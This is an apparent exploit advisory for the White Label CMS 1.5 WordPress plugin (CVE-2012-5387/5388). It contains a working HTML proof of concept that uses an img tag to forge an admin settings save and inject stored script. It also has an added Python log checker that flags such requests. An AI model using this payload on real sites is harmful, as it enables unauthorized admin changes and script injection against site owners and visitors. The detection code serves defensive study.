White Label CMS 1.5 CSRF & persistent XSS

2012.10.23
Credit: pcsjj
Risk: Low
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS
# Date: 21/10/2012
# Exploit Author: pcsjj
# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/
# Version: 1.5
# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/
# Downloads: 110,313
# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)

<html>
<title>White Label CMS CSRF</title>
<body>
<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div "'>
</body>
</html>
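Added example (not part of the original advisory): a web-server log check for the request shape the PoC above produces, a settings save on wlcms-plugin.php that arrives as a GET, from another site, with markup in a parameter. The log lines and the host blog.example are constructed; Combined Log Format and the rule that legitimate saves are not cross-site GETs are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format (assumed): ip - user [time] "METHOD target PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
MARKUP = re.compile(r'[<>"\']')  # characters that can break out of an HTML attribute

# Constructed sample lines; browsers percent-encode the PoC's quotes, brackets and space.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Oct/2012:10:00:00 +0000] "GET /wordpress/wp-admin/admin.php'
    '?page=wlcms-plugin.php&action=save&wlcms_o_developer_name='
    '%22%3E%3Cscript%3Ealert(%22fun%22)%3C/script%3E%3Cdiv%20%22 HTTP/1.1" 200 512 '
    '"http://other.example/poc.html" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Oct/2012:10:05:00 +0000] "GET /wordpress/wp-admin/admin.php'
    '?page=wlcms-plugin.php HTTP/1.1" 200 512 '
    '"http://blog.example/wordpress/wp-admin/" "Mozilla/5.0"',
]

def inspect(line, site_host):
    """Return the reasons a log line matches the advisory's request pattern, or []."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    params = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes values
    if not url.path.endswith("/wp-admin/admin.php"):
        return []
    if params.get("page") != ["wlcms-plugin.php"] or params.get("action") != ["save"]:
        return []
    reasons = []
    if m["method"] == "GET":
        reasons.append("settings-save-via-GET")  # an <img> tag can only issue a GET
    if urlsplit(m["referer"]).hostname != site_host:
        reasons.append("cross-site-or-missing-referer")  # CSRF indicator
    for name, values in params.items():
        if any(MARKUP.search(v) for v in values):
            reasons.append(f"markup-in-{name}")  # stored XSS indicator
    return reasons

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect(entry, "blog.example"))
```
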

References:

http://www.videousermanuals.com/white-label-cms/
http://plugins.svn.wordpress.org/white-label-cms/branches/

